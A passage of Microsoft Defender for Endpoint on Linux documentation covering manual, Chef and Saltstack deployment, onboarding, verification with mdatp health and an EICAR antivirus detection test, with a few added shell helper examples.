cookbook_file '/etc/opt/microsoft/mdatp/managed/mdatp_managed.json' do
  source 'mdatp_managed.json'
  owner 'root'
  group 'root'
  mode '0755'
  action :create
end

To include this step as part of the recipe, add include_recipe '::settings_mdatp' to
your default.rb file within the recipes folder.

You can also use crontab to schedule automatic updates; see Schedule an update of the
Microsoft Defender for Endpoint (Linux).

Uninstall MDATP cookbook:

Ruby

# Uninstall the Defender package
case node['platform_family']
when 'debian'
  apt_package 'mdatp' do
    action :remove
  end
when 'rhel'
  # platform_version is a string; compare its major number as an integer
  if node['platform_version'].to_i <= 8
    yum_package 'mdatp' do
      action :remove
    end
  else
    dnf_package 'mdatp' do
      action :remove
    end
  end
end

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Deploy Microsoft Defender for Endpoint
on Linux manually
Article • 02/21/2024

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

 Tip

Looking for advanced guidance on deploying Microsoft Defender for Endpoint on
Linux? See Advanced deployment guide on Defender for Endpoint on Linux.

This article describes how to deploy Microsoft Defender for Endpoint on Linux manually.
A successful deployment requires the completion of all of the following tasks:

Prerequisites and system requirements
Configure the Linux software repository
  RHEL and variants (CentOS, Fedora, Oracle Linux, Amazon Linux 2, Rocky and Alma)
  SLES and variants
  Ubuntu and Debian systems
  Mariner
Application installation
  RHEL and variants (CentOS, Fedora, Oracle Linux, Amazon Linux 2, Rocky and Alma)
  SLES and variants
  Ubuntu and Debian systems
  Mariner
Download the onboarding package
Client configuration

Prerequisites and system requirements


Before you get started, see Microsoft Defender for Endpoint on Linux for a description
of prerequisites and system requirements for the current software version.

2 Warning

Upgrading your operating system to a new major version after the product
installation requires the product to be reinstalled. You need to Uninstall the
existing Defender for Endpoint on Linux, upgrade the operating system, and then
reconfigure Defender for Endpoint on Linux following the below steps.

Configure the Linux software repository


Defender for Endpoint on Linux can be deployed from one of the following channels
(denoted below as [channel]): insiders-fast, insiders-slow, or prod. Each of these channels
corresponds to a Linux software repository. The instructions in this article describe
configuring your device to use one of these repositories.

The choice of the channel determines the type and frequency of updates that are
offered to your device. Devices in insiders-fast are the first ones to receive updates and
new features, followed later by insiders-slow and lastly by prod.

In order to preview new features and provide early feedback, it's recommended that you
configure some devices in your enterprise to use either insiders-fast or insiders-slow.

2 Warning

Switching the channel after the initial installation requires the product to be
reinstalled. To switch the product channel: uninstall the existing package, re-
configure your device to use the new channel, and follow the steps in this
document to install the package from the new location.

Installer script

This article describes manual installation. Alternatively, you can use the automated
installer bash script provided in our public GitHub repository. The script identifies the
distribution and version, simplifies the selection of the right repository, sets up the
device to pull the latest package, and combines the product installation and onboarding
steps.

Bash

> ./mde_installer.sh --help
usage: basename ./mde_installer.sh [OPTIONS]
Options:
 -c|--channel         specify the channel from which you want to install. Default: insiders-fast
 -i|--install         install the product
 -r|--remove          remove the product
 -u|--upgrade         upgrade the existing product
 -o|--onboard         onboard/offboard the product with <onboarding_script>
 -p|--passive-mode    set EPP to passive mode
 -t|--tag             set a tag by declaring <name> and <value>. ex: -t GROUP Coders
 -m|--min_req         enforce minimum requirements
 -w|--clean           remove repo from package manager for a specific channel
 -v|--version         print out script version
 -h|--help            display help

Read more here.

RHEL and variants (CentOS, Fedora, Oracle Linux, Amazon Linux 2, Rocky and Alma)

Install yum-utils if it isn't installed yet:

Bash

sudo yum install yum-utils

Note

Note your distribution and version, and identify the closest entry (by major, then
minor) for it under https://packages.microsoft.com/config/rhel/.

Use the following table to help guide you in locating the package:

Distro & version                              | Package
For Alma 8.4 and higher                       | https://packages.microsoft.com/config/alma/8/prod.repo
For Alma 9.2 and higher                       | https://packages.microsoft.com/config/alma/9/prod.repo
For RHEL/CentOS/Oracle 9.0-9.8                | https://packages.microsoft.com/config/rhel/9/prod.repo
For RHEL/CentOS/Oracle 8.0-8.8                | https://packages.microsoft.com/config/rhel/8/prod.repo
For RHEL/CentOS/Oracle 7.2-7.9 & Amazon Linux 2 | https://packages.microsoft.com/config/rhel/7.2/prod.repo
For Amazon Linux 2023                         | https://packages.microsoft.com/config/amazonlinux/2023/prod.repo
For Fedora 33                                 | https://packages.microsoft.com/config/fedora/33/prod.repo
For Fedora 34                                 | https://packages.microsoft.com/config/fedora/34/prod.repo
For Rocky 8.7 and higher                      | https://packages.microsoft.com/config/rocky/8/prod.repo
For Rocky 9.2 and higher                      | https://packages.microsoft.com/config/rocky/9/prod.repo


In the following commands, replace [version] and [channel] with the information
you've identified:

Bash

sudo yum-config-manager --add-repo=https://packages.microsoft.com/config/rhel/[version]/[channel].repo

Tip

Use the hostnamectl command to identify system-related information, including the
release [version].

For example, if you're running CentOS 7 and want to deploy Defender for Endpoint
on Linux from the prod channel:

Bash

sudo yum-config-manager --add-repo=https://packages.microsoft.com/config/rhel/7/prod.repo

Or, if you wish to explore new features on selected devices, you might want to
deploy Microsoft Defender for Endpoint on Linux from the insiders-fast channel:

Bash

sudo yum-config-manager --add-repo=https://packages.microsoft.com/config/rhel/7/insiders-fast.repo

Install the Microsoft GPG public key:

Bash

sudo rpm --import https://packages.microsoft.com/keys/microsoft.asc

SLES and variants

Note

Note your distribution and version, and identify the closest entry (by major, then minor)
for it under https://packages.microsoft.com/config/sles/.

In the following commands, replace [distro] and [version] with the information you've
identified:

Bash

sudo zypper addrepo -c -f -n microsoft-[channel] https://packages.microsoft.com/config/[distro]/[version]/[channel].repo

Tip

Use the SPident command to identify system-related information, including the release
[version].

For example, if you're running SLES 12 and wish to deploy Microsoft Defender for
Endpoint on Linux from the prod channel:
Bash

sudo zypper addrepo -c -f -n microsoft-prod https://packages.microsoft.com/config/sles/12/prod.repo

Install the Microsoft GPG public key:

Bash

sudo rpm --import https://packages.microsoft.com/keys/microsoft.asc

Ubuntu and Debian systems


Install curl if it isn't installed yet:

Bash

sudo apt-get install curl

Install libplist-utils if it isn't installed yet:

Bash

sudo apt-get install libplist-utils

Note

Note your distribution and version, and identify the closest entry (by major, then
minor) for it under https://packages.microsoft.com/config/[distro]/.

In the following command, replace [distro] and [version] with the information
you've identified:

Bash

curl -o microsoft.list https://packages.microsoft.com/config/[distro]/[version]/[channel].list

Tip

Use the hostnamectl command to identify system-related information, including the
release [version].

For example, if you're running Ubuntu 18.04 and wish to deploy Microsoft
Defender for Endpoint on Linux from the prod channel:

Bash

curl -o microsoft.list https://packages.microsoft.com/config/ubuntu/18.04/prod.list

Install the repository configuration:

Bash

sudo mv ./microsoft.list /etc/apt/sources.list.d/microsoft-[channel].list

For example, if you chose prod channel:

Bash

sudo mv ./microsoft.list /etc/apt/sources.list.d/microsoft-prod.list

Install the gpg package if not already installed:

Bash

sudo apt-get install gpg

If gpg isn't available, install gnupg instead.

Bash

sudo apt-get install gnupg

Install the Microsoft GPG public key:


For Debian 11 and earlier, run the following command.

Bash

curl -sSL https://packages.microsoft.com/keys/microsoft.asc | gpg --dearmor | sudo tee /etc/apt/trusted.gpg.d/microsoft.gpg > /dev/null

For Debian 12 and later, run the following command.

Bash

curl -sSL https://packages.microsoft.com/keys/microsoft.asc | gpg --dearmor | sudo tee /usr/share/keyrings/microsoft-prod.gpg > /dev/null

Install the HTTPS driver if not already installed:

Bash

sudo apt-get install apt-transport-https

Update the repository metadata:

Bash

sudo apt-get update

Mariner
Install dnf-plugins-core if it isn't installed yet:

Bash

sudo dnf install dnf-plugins-core

Configure and Enable the required repositories

Note

On Mariner, the Insiders Fast channel is not available.

To deploy Defender for Endpoint on Linux from the prod channel, use the following
commands:

Bash

sudo dnf install mariner-repos-extras
sudo dnf config-manager --enable mariner-official-extras

Or, if you wish to explore new features on selected devices, you might want to
deploy Microsoft Defender for Endpoint on Linux from the insiders-slow channel. Use the
following commands:

Bash

sudo dnf install mariner-repos-extras-preview


sudo dnf config-manager --enable mariner-official-extras-preview
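The channel and repository selection described in this section, and the per-distro table above, as an added shell example (not Microsoft's installer script and not code from this page): it reads the ID and VERSION_ID fields of /etc/os-release (an assumption; hostnamectl reports the same information), maps them to the packages.microsoft.com config URL following the table for RHEL variants, Amazon Linux, Fedora, SLES, Ubuntu and Debian, and prints the matching yum-config-manager, zypper or curl/mv command for whichever channel you pass. Mariner uses its own dnf repositories and is not covered. The function names mde_repo_url and mde_repo_command are hypothetical.

```shell
#!/bin/sh
# Derive the packages.microsoft.com config URL and the repository-setup command
# for this host from /etc/os-release, following the distro/version table above.
# Added example for this page; not Microsoft's mde_installer.sh.
# Assumption: the distribution is identified from the ID and VERSION_ID fields
# of os-release (the same data hostnamectl shows).

# mde_repo_url CHANNEL OS_RELEASE_TEXT
#   Prints the config URL for CHANNEL (prod, insiders-slow, insiders-fast);
#   prints nothing and returns 1 if the distribution isn't in the table.
mde_repo_url() {
    channel="$1"
    osrel="$2"
    id=$(printf '%s\n' "$osrel" | sed -n 's/^ID="\{0,1\}\([^"]*\)"\{0,1\}$/\1/p')
    ver=$(printf '%s\n' "$osrel" | sed -n 's/^VERSION_ID="\{0,1\}\([^"]*\)"\{0,1\}$/\1/p')
    major=${ver%%.*}
    case "$id" in
        almalinux) path="alma/$major";  ext=repo ;;
        rocky)     path="rocky/$major"; ext=repo ;;
        rhel|centos|ol)
            # 7.x shares the rhel/7.2 repo; 8.x and 9.x use the major version
            if [ "$major" = 7 ]; then path="rhel/7.2"; else path="rhel/$major"; fi
            ext=repo ;;
        amzn)
            # Amazon Linux 2 uses the rhel/7.2 repo; Amazon Linux 2023 has its own
            if [ "$ver" = 2 ]; then path="rhel/7.2"; else path="amazonlinux/$ver"; fi
            ext=repo ;;
        fedora)    path="fedora/$ver";  ext=repo ;;
        sles|sled) path="sles/$major";  ext=repo ;;
        ubuntu)    path="ubuntu/$ver";  ext=list ;;
        debian)    path="debian/$ver";  ext=list ;;
        *) return 1 ;;
    esac
    printf 'https://packages.microsoft.com/config/%s/%s.%s\n' "$path" "$channel" "$ext"
}

# mde_repo_command CHANNEL OS_RELEASE_TEXT
#   Prints the command that registers the repository with the host's package
#   manager (zypper for SLES, apt list file for Ubuntu/Debian, yum otherwise).
mde_repo_command() {
    url=$(mde_repo_url "$1" "$2") || return 1
    case "$url" in
        */sles/*) printf 'sudo zypper addrepo -c -f -n microsoft-%s %s\n' "$1" "$url" ;;
        *.list)   printf 'curl -o microsoft.list %s && sudo mv ./microsoft.list /etc/apt/sources.list.d/microsoft-%s.list\n' "$url" "$1" ;;
        *)        printf 'sudo yum-config-manager --add-repo=%s\n' "$url" ;;
    esac
}

# When run directly, show the prod-channel command for this host.
if [ -r /etc/os-release ]; then
    mde_repo_command prod "$(cat /etc/os-release)" \
        || echo "this distribution isn't in the table above" >&2
fi
```

The script only prints the command; review it, then run it with the Microsoft GPG key import that follows in each distro section.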

Application installation

RHEL and variants (CentOS, Fedora, Oracle Linux, Amazon Linux 2, Rocky and Alma)

Bash

sudo yum install mdatp

Note

If you have multiple Microsoft repositories configured on your device, you can be
specific about which repository to install the package from. The following example
shows how to install the package from the production channel if you also have the
insiders-fast repository channel configured on this device. This situation can
happen if you are using multiple Microsoft products on your device. Depending on
the distribution and the version of your server, the repository alias might be
different than the one in the following example.

Bash

# list all repositories
yum repolist

Console

...
packages-microsoft-com-prod                  packages-microsoft-com-prod       316
packages-microsoft-com-prod-insiders-fast    packages-microsoft-com-prod-ins     2
...

Bash

# install the package from the production repository
sudo yum --enablerepo=packages-microsoft-com-prod install mdatp

SLES and variants


Bash

sudo zypper install mdatp

Note

If you have multiple Microsoft repositories configured on your device, you can be
specific about which repository to install the package from. The following example
shows how to install the package from the production channel if you also have the
insiders-fast repository channel configured on this device. This situation can
happen if you are using multiple Microsoft products on your device.

Bash

zypper repos

Console

...
# | Alias | Name | ...
XX | packages-microsoft-com-insiders-fast | microsoft-insiders-fast | ...
XX | packages-microsoft-com-prod | microsoft-prod | ...
...

Bash

sudo zypper install packages-microsoft-com-prod:mdatp

Ubuntu and Debian systems


Bash

sudo apt-get install mdatp

Note

If you have multiple Microsoft repositories configured on your device, you can be
specific about which repository to install the package from. The following example
shows how to install the package from the production channel if you also have the
insiders-fast repository channel configured on this device. This situation can
happen if you are using multiple Microsoft products on your device.

Bash

cat /etc/apt/sources.list.d/*

Console

deb [arch=arm64,armhf,amd64]
https://packages.microsoft.com/config/ubuntu/18.04/prod insiders-fast main
deb [arch=amd64] https://packages.microsoft.com/config/ubuntu/18.04/prod
bionic main

Bash

sudo apt -t bionic install mdatp

Note

Reboots are NOT required after installing or updating Microsoft Defender for
Endpoint on Linux, except when you're running auditD in immutable mode.

Mariner
Bash

sudo dnf install mdatp

Note

If you have multiple Microsoft repositories configured on your device, you can be
specific about which repository to install the package from. The following example
shows how to install the package from the production channel if you also have the
insiders-slow repository channel configured on this device. This situation can
happen if you are using multiple Microsoft products on your device.

Bash

sudo dnf config-manager --disable mariner-official-extras-preview
sudo dnf config-manager --enable mariner-official-extras

Download the onboarding package


Download the onboarding package from Microsoft Defender portal.

Warning

Repackaging the Defender for Endpoint installation package is not a supported
scenario. Doing so can negatively impact the integrity of the product and lead to
adverse results, including but not limited to triggering tampering alerts and
updates failing to apply.

Important

If you miss this step, any command executed will show a warning message
indicating that the product is unlicensed. Also, the mdatp health command returns
a value of false.

1. In the Microsoft Defender portal, go to Settings > Endpoints > Device
management > Onboarding.

2. In the first drop-down menu, select Linux Server as the operating system. In the
second drop-down menu, select Local Script as the deployment method.

3. Select Download onboarding package. Save the file as
WindowsDefenderATPOnboardingPackage.zip.

4. From a command prompt, verify that you have the file, and extract the contents of
the archive:

Bash

ls -l

Console

total 8
-rw-r--r-- 1 test staff 5752 Feb 18 11:22
WindowsDefenderATPOnboardingPackage.zip

Bash

unzip WindowsDefenderATPOnboardingPackage.zip

Console

Archive: WindowsDefenderATPOnboardingPackage.zip
inflating: MicrosoftDefenderATPOnboardingLinuxServer.py

Client configuration

1. Copy MicrosoftDefenderATPOnboardingLinuxServer.py to the target device.

Note

Initially the client device is not associated with an organization and the orgId
attribute is blank.

Bash

mdatp health --field org_id

2. Run MicrosoftDefenderATPOnboardingLinuxServer.py.

Note

To run this command, you must have python or python3 installed on the
device, depending on the distro and version. If needed, see Step-by-step
Instructions for Installing Python on Linux.

Note

To onboard a device that was previously offboarded, you must remove the
mdatp_offboard.json file located at /etc/opt/microsoft/mdatp.

If you're running RHEL 8.x or Ubuntu 20.04 or higher, you'll need to use python3 .

Bash

sudo python3 MicrosoftDefenderATPOnboardingLinuxServer.py

For the rest of distros and versions, you'll need to use python .

Bash

sudo python MicrosoftDefenderATPOnboardingLinuxServer.py

3. Verify that the device is now associated with your organization and reports a valid
organization identifier:

Bash

mdatp health --field org_id


4. Check the health status of the product by running the following command. A
return value of true denotes that the product is functioning as expected:

Bash

mdatp health --field healthy

Important

When the product starts for the first time, it downloads the latest antimalware
definitions. This may take up to a few minutes depending on the network
connectivity. During this time the above command returns a value of false.
You can check the status of the definition update using the following
command:

Bash

mdatp health --field definitions_status

You may also need to configure a proxy after completing the initial installation.
See Configure Defender for Endpoint on Linux for static proxy discovery:
Post-installation configuration.

5. Run an AV detection test to verify that the device is properly onboarded and
reporting to the service. Perform the following steps on the newly onboarded
device:

Ensure that real-time protection is enabled (denoted by a result of true from
running the following command):

Bash

mdatp health --field real_time_protection_enabled

If it isn't enabled, execute the following command:

Bash

mdatp config real-time-protection --value enabled

Open a Terminal window and execute the following command:


Bash

curl -o /tmp/eicar.com.txt https://secure.eicar.org/eicar.com.txt

The file should have been quarantined by Defender for Endpoint on Linux.
Use the following command to list all the detected threats:

Bash

mdatp threat list

6. Run an EDR detection test and simulate a detection to verify that the device is
properly onboarded and reporting to the service. Perform the following steps on
the newly onboarded device:

Verify that the onboarded Linux server appears in Microsoft Defender XDR. If
this is the first onboarding of the machine, it can take up to 20 minutes until
it appears.

Download and extract the script file to an onboarded Linux server and run
the following command: ./mde_linux_edr_diy.sh

After a few minutes, a detection should be raised in Microsoft Defender XDR.

Look at the alert details, machine timeline, and perform your typical
investigation steps.
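The verification steps above query one field at a time with mdatp health --field. As an added example (not part of the product, the page, or the onboarding script), the shell functions below parse one full mdatp health capture and report every failed check together, so a fleet-wide run shows at a glance which devices have a blank org_id, are unlicensed, have real-time protection off, or are still downloading definitions. The names health_field and verify_onboarding, and the assumed line format (name : value, string values in double quotes), are mine; the two sample captures are constructed, not taken from a device.

```shell
#!/bin/sh
# Post-onboarding verification for Defender for Endpoint on Linux.
# Added example for this page; not part of the product or the onboarding script.
# The assumed `mdatp health` line format ("name : value", strings in double
# quotes) is an assumption, not something the page guarantees.

# health_field OUTPUT NAME
#   Prints the value of field NAME from OUTPUT, with surrounding quotes removed.
health_field() {
    printf '%s\n' "$1" \
        | sed -n "s/^$2[[:space:]]*:[[:space:]]*//p" \
        | sed 's/^"\(.*\)"$/\1/'
}

# verify_onboarding OUTPUT
#   Runs the checks from the steps above against one `mdatp health` capture.
#   Prints one line per failed check; returns 0 only when every check passes.
verify_onboarding() {
    out="$1"
    rc=0
    [ -n "$(health_field "$out" org_id)" ] \
        || { echo "org_id is blank: the device isn't onboarded yet"; rc=1; }
    [ "$(health_field "$out" licensed)" = true ] \
        || { echo "product is unlicensed: onboarding step missed or failed"; rc=1; }
    [ "$(health_field "$out" healthy)" = true ] \
        || { echo "healthy is not true: definitions may still be downloading"; rc=1; }
    [ "$(health_field "$out" real_time_protection_enabled)" = true ] \
        || { echo "real-time protection is off: mdatp config real-time-protection --value enabled"; rc=1; }
    [ "$(health_field "$out" definitions_status)" = up_to_date ] \
        || { echo "definitions_status is $(health_field "$out" definitions_status), not up_to_date"; rc=1; }
    return "$rc"
}

# Constructed sample captures (not from a real device) so the script runs offline.
# On a device, use:  verify_onboarding "$(mdatp health)"
SAMPLE_OK='healthy                                     : true
licensed                                    : true
org_id                                      : "00000000-0000-0000-0000-000000000000"
real_time_protection_enabled                : true
definitions_status                          : "up_to_date"'

SAMPLE_NOT_ONBOARDED='healthy                                     : false
licensed                                    : false
org_id                                      : ""
real_time_protection_enabled                : true
definitions_status                          : "updating"'

verify_onboarding "$SAMPLE_OK" && echo "sample OK: all checks passed"
verify_onboarding "$SAMPLE_NOT_ONBOARDED" || echo "sample NOT_ONBOARDED: checks failed as expected"
```

Because the product reports healthy as false until the first definition download completes, a failed healthy check right after onboarding is expected; rerun the script after a few minutes before treating it as an error.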

Microsoft Defender for Endpoint package external package dependencies

The following external package dependencies exist for the mdatp package:

The mdatp RPM package requires "glibc >= 2.17", "audit", "policycoreutils",
"semanage", "selinux-policy-targeted", "mde-netfilter"
For RHEL6 the mdatp RPM package requires "audit", "policycoreutils", "libselinux",
"mde-netfilter"
For DEBIAN the mdatp package requires "libc6 >= 2.23", "uuid-runtime", "auditd",
"mde-netfilter"
For Mariner the mdatp package requires "attr", "audit", "diffutils", "libacl", "libattr",
"libselinux-utils", "selinux-policy", "policycoreutils", "mde-netfilter"

The mde-netfilter package also has the following package dependencies:

For DEBIAN the mde-netfilter package requires "libnetfilter-queue1", "libglib2.0-0"
For RPM the mde-netfilter package requires "libmnl", "libnfnetlink",
"libnetfilter_queue", "glib2"
For Mariner the mde-netfilter package requires "libnfnetlink", "libnetfilter_queue"

If the Microsoft Defender for Endpoint installation fails with missing-dependency
errors, you can manually download the prerequisite dependencies.

Log installation issues


See Log installation issues for more information on how to find the automatically
generated log that is created by the installer when an error occurs.

How to migrate from Insiders-Fast to Production channel

1. Uninstall the "Insiders-Fast channel" version of Defender for Endpoint on Linux.

Bash

sudo yum remove mdatp

2. Disable the Defender for Endpoint on Linux Insiders-Fast repo

Bash

sudo yum repolist

Note

The output should show "packages-microsoft-com-fast-prod".

Bash

sudo yum-config-manager --disable packages-microsoft-com-fast-prod

3. Redeploy Microsoft Defender for Endpoint on Linux using the "Production
channel".

Uninstallation
See Uninstall for details on how to remove Defender for Endpoint on Linux from client
devices.

See also
Investigate agent health issues

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.



Deploy Microsoft Defender for Endpoint on Linux with Saltstack
Article • 02/21/2024

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

This article describes how to deploy Defender for Endpoint on Linux using Saltstack. A
successful deployment requires the completion of all of the following tasks:

Download the onboarding package
Create Saltstack state files
Deployment
Reference

Important

This article contains information about third-party tools. This is provided to help
complete integration scenarios; however, Microsoft does not provide
troubleshooting support for third-party tools.
Contact the third-party vendor for support.

Prerequisites and system requirements


Before you get started, see the main Defender for Endpoint on Linux page for a
description of prerequisites and system requirements for the current software version.

In addition, for Saltstack deployment, you need to be familiar with Saltstack
administration, have Saltstack installed, configure the Master and Minions, and know
how to apply states. Saltstack has many ways to complete the same task. These
instructions assume availability of supported Saltstack modules, such as apt and
unarchive, to help deploy the package. Your organization might use a different workflow.
Refer to the Saltstack documentation for details.

Saltstack is installed on at least one computer (Saltstack calls this computer the
master).

The Saltstack master has accepted the connections of the managed nodes (Saltstack
calls the nodes minions).

The Saltstack minions are able to resolve communication to the Saltstack master
(by default the minions try to communicate with a machine named 'salt').

Run this ping test:

Bash

sudo salt '*' test.ping

The Saltstack master has a file server location where the Microsoft Defender for
Endpoint files can be distributed from (by default Saltstack uses the /srv/salt folder
as the distribution point).

Download the onboarding package


Download the onboarding package from Microsoft Defender portal.

Warning

Repackaging the Defender for Endpoint installation package is not a supported
scenario. Doing so can negatively impact the integrity of the product and lead to
adverse results, including but not limited to triggering tampering alerts and
updates failing to apply.

1. In the Microsoft Defender portal, go to Settings > Endpoints > Device management
> Onboarding.

2. In the first drop-down menu, select Linux Server as the operating system. In the
second drop-down menu, select Your preferred Linux configuration management
tool as the deployment method.

3. Select Download onboarding package. Save the file as
WindowsDefenderATPOnboardingPackage.zip.

4. On the SaltStack Master, extract the contents of the archive to the SaltStack
Server's folder (typically /srv/salt):

Bash

ls -l

Output

total 8
-rw-r--r-- 1 test staff 4984 Feb 18 11:22
WindowsDefenderATPOnboardingPackage.zip

Bash

unzip WindowsDefenderATPOnboardingPackage.zip -d /srv/salt/mde

Output

Archive: WindowsDefenderATPOnboardingPackage.zip
inflating: /srv/salt/mde/mdatp_onboard.json

Create Saltstack state files


Create a SaltState state file in your configuration repository (typically /srv/salt ) that
applies the necessary states to deploy and onboard Defender for Endpoint.

Add the Defender for Endpoint repository and key, install_mdatp.sls :

Defender for Endpoint on Linux can be deployed from one of the following
channels (described as [channel]): insiders-fast, insiders-slow, or prod. Each of these
channels corresponds to a Linux software repository.

The choice of the channel determines the type and frequency of updates that are
offered to your device. Devices in insiders-fast are the first ones to receive updates
and new features, followed later by insiders-slow and lastly by prod.

In order to preview new features and provide early feedback, we recommend
that you configure some devices in your enterprise to use either insiders-fast or
insiders-slow.

Warning

Switching the channel after the initial installation requires the product to be
reinstalled. To switch the product channel: uninstall the existing package,
reconfigure your device to use the new channel, and follow the steps in this
document to install the package from the new location.

Note your distribution and version and identify the closest entry for it under
https://packages.microsoft.com/config/[distro]/ .

In the following commands, replace [distro] and [version] with your information.

Note

In the case of Oracle Linux and Amazon Linux 2, replace [distro] with "rhel". For
Amazon Linux 2, replace [version] with "7". For Oracle Linux, replace [version]
with the version of Oracle Linux.

Bash

cat /srv/salt/install_mdatp.sls

Output

add_ms_repo:
  pkgrepo.managed:
    - humanname: Microsoft Defender Repository
    {% if grains['os_family'] == 'Debian' %}
    - name: deb [arch=amd64,armhf,arm64] https://packages.microsoft.com/[distro]/[version]/[channel] [codename] main
    - dist: [codename]
    - file: /etc/apt/sources.list.d/microsoft-[channel].list
    - key_url: https://packages.microsoft.com/keys/microsoft.asc
    - refresh: true
    {% elif grains['os_family'] == 'RedHat' %}
    - name: packages-microsoft-[channel]
    - file: microsoft-[channel]
    - baseurl: https://packages.microsoft.com/[distro]/[version]/[channel]/
    - gpgkey: https://packages.microsoft.com/keys/microsoft.asc
    - gpgcheck: true
    {% endif %}

Add the package installed state to install_mdatp.sls after the add_ms_repo state
as previously defined.

Output

install_mdatp_package:
  pkg.installed:
    - name: mdatp
    # Salt requisite: the repository state must have run first
    - require:
      - pkgrepo: add_ms_repo

Add the onboarding file deployment to install_mdatp.sls after the


install_mdatp_package as previously defined.

Output

copy_mde_onboarding_file:
  file.managed:
    - name: /etc/opt/microsoft/mdatp/mdatp_onboard.json
    - source: salt://mde/mdatp_onboard.json
    # the package creates /etc/opt/microsoft/mdatp, so install it first
    - require:
      - pkg: install_mdatp_package

The completed install state file should look similar to this output:

Output

add_ms_repo:
  pkgrepo.managed:
    - humanname: Microsoft Defender Repository
    {% if grains['os_family'] == 'Debian' %}
    - name: deb [arch=amd64,armhf,arm64] https://packages.microsoft.com/[distro]/[version]/[channel] [codename] main
    - dist: [codename]
    - file: /etc/apt/sources.list.d/microsoft-[channel].list
    - key_url: https://packages.microsoft.com/keys/microsoft.asc
    - refresh: true
    {% elif grains['os_family'] == 'RedHat' %}
    - name: packages-microsoft-[channel]
    - file: microsoft-[channel]
    - baseurl: https://packages.microsoft.com/[distro]/[version]/[channel]/
    - gpgkey: https://packages.microsoft.com/keys/microsoft.asc
    - gpgcheck: true
    {% endif %}

install_mdatp_package:
  pkg.installed:
    - name: mdatp
    - require:
      - pkgrepo: add_ms_repo

copy_mde_onboarding_file:
  file.managed:
    - name: /etc/opt/microsoft/mdatp/mdatp_onboard.json
    - source: salt://mde/mdatp_onboard.json
    - require:
      - pkg: install_mdatp_package

Create a SaltState state file in your configuration repository (typically /srv/salt ) that
applies the necessary states to offboard and remove Defender for Endpoint. Before
using the offboarding state file, you need to download the offboarding package from
the Security portal and extract it in the same way you did the onboarding package. The
downloaded offboarding package is only valid for a limited period of time.

Create an uninstall state file uninstall_mdatp.sls and add the state to remove the
mdatp_onboard.json file:

Bash

cat /srv/salt/uninstall_mdatp.sls

Output

remove_mde_onboarding_file:
  file.absent:
    - name: /etc/opt/microsoft/mdatp/mdatp_onboard.json

Add the offboarding file deployment to the uninstall_mdatp.sls file after the
remove_mde_onboarding_file state defined in the previous section.

Output

offboard_mde:
  file.managed:
    - name: /etc/opt/microsoft/mdatp/mdatp_offboard.json
    - source: salt://mde/mdatp_offboard.json

Add the removal of the MDATP package to the uninstall_mdatp.sls file after the
offboard_mde state defined in the previous section.

Output

remove_mde_packages:
  pkg.removed:
    - name: mdatp

The complete uninstall state file should look similar to the following output:

Output

remove_mde_onboarding_file:
  file.absent:
    - name: /etc/opt/microsoft/mdatp/mdatp_onboard.json

offboard_mde:
  file.managed:
    - name: /etc/opt/microsoft/mdatp/mdatp_offboard.json
    - source: salt://mde/mdatp_offboard.json

remove_mde_packages:
  pkg.removed:
    - name: mdatp

Deployment

Now apply the state to the minions. The following command applies the state to
machines whose name begins with mdetest.

Installation:

Bash

salt 'mdetest*' state.apply install_mdatp

Important

When the product starts for the first time, it downloads the latest antimalware
definitions. Depending on your Internet connection, this can take up to a few
minutes.

Validation/configuration:

Bash
salt 'mdetest*' cmd.run 'mdatp connectivity test'

Bash

salt 'mdetest*' cmd.run 'mdatp health'

Uninstallation:

Bash

salt 'mdetest*' state.apply uninstall_mdatp

Log installation issues


For more information on how to find the automatically generated log that's created by
the installer when an error occurs, see Log installation issues.

Operating system upgrades


When upgrading your operating system to a new major version, you must first uninstall
Defender for Endpoint on Linux, install the upgrade, and finally reconfigure Defender for
Endpoint on Linux on your device.

Reference
SALT Project documentation

See also
Investigate agent health issues

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.


Advanced deployment guidance for Microsoft Defender for Endpoint on Linux
Article • 11/29/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2

This article provides advanced deployment guidance for Microsoft Defender for
Endpoint on Linux. You get a brief summary of the deployment steps, learn about the
system requirements, and are then guided through the actual deployment steps. You also
learn how to verify that the device has been correctly onboarded.

For information about Microsoft Defender for Endpoint capabilities, see Advanced
Microsoft Defender for Endpoint capabilities.

To learn about other ways to deploy Microsoft Defender for Endpoint on Linux, see:

Manual deployment
Puppet based deployment
Ansible based deployment
Deploy Defender for Endpoint on Linux with Chef

Deployment summary
Learn about the general guidance on a typical Microsoft Defender for Endpoint on Linux
deployment. The applicability of some steps is determined by the requirements of your
Linux environment.

1. Work with your Firewall, Proxy, and Networking admin.

2. Capture performance data from the endpoint.

Note

Consider doing the following optional items. Even though they aren't specific to
Microsoft Defender for Endpoint, they tend to improve performance on Linux systems.

3. (Optional) Check for filesystem errors 'fsck' (akin to chkdsk).

4. (Optional) Update storage subsystem drivers.

5. (Optional) Update nic drivers.

6. Confirm system requirements and resource recommendations are met.

7. Add your existing solution to the exclusion list for Microsoft Defender Antivirus.

8. Review important points about exclusions.

9. Create Device Groups.

10. Configure Microsoft Defender for Endpoint on Linux antimalware settings.

11. Download the Microsoft Defender for Endpoint on Linux onboarding package from
the Microsoft Defender portal.

12. Use Ansible, Puppet, or Chef to manage Microsoft Defender for Endpoint on Linux.

13. Troubleshoot installation issues for Microsoft Defender for Endpoint on Linux.

14. Check resource utilization statistics and report on predeployment utilization
compared to post-deployment.

15. Verify communication with Microsoft Defender for Endpoint backend.

16. Investigate agent health issues.

17. Verify that you're able to get "Platform Updates" (agent updates).

18. Verify that you're able to get "Security Intelligence Updates" (signatures/definition
updates).

19. Test detections.

20. Troubleshoot missing events or alerts issues for Microsoft Defender for Endpoint
on Linux.

21. Troubleshooting High CPU utilization by ISVs, Linux apps, or scripts.

22. Uninstall your non-Microsoft solution.

1. Work with your Firewall, Proxy, and Networking admin

